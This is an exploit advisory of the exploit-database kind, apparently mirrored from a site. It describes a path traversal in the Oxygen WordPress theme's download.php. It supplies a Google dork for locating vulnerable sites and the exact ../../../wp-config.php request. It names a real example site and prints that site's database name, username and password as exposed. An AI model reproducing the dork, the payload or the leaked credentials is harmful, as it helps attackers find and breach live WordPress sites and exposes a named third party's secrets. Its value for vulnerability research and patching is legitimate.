Below is a copy: WordPress 4.2.2 Oxygen-Theme Themes Database Configuration File Download
############################################################################################
# Exploit Title : WordPress 4.2.2 Oxygen-Theme Themes Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepage : themeforest.net
# Software Information Link : themeforest.net/item/oxygen-woocommerce-wordpress-theme/7851484
# Software Affected Version : 4.x.x - 4.2.2
# Software Price Type : Paid Download - 60$
# Solution : Update to 5.0.x version
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/themes/oxygen-theme/
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
############################################################################################
# Impact :
***********
* WordPress 4.2.2 Oxygen-Theme Themes is prone to a vulnerability that lets attackers download database config file because
the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
within the context of the web server process and obtain potentially sensitive informations.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
to a location that is outside of that directory.
############################################################################################
# Vulnerable File :
****************
/download.php
# Vulnerable Parameter :
**********************
?file=
# Database Configuration File Download Exploit :
********************************************
/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');
/** MySQL database username */
define('DB_USER', '');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', '');
############################################################################################
# Example Vulnerable Sites :
*************************
[+] klimatrol.com/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/
** The name of the database for WordPress */
define('DB_NAME', 'klimatro_wrdp1');
/** MySQL database username */
define('DB_USER', 'klimatro_wrdp1');
/** MySQL database password */
define('DB_PASSWORD', 'Ijye1KJY6{BN');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum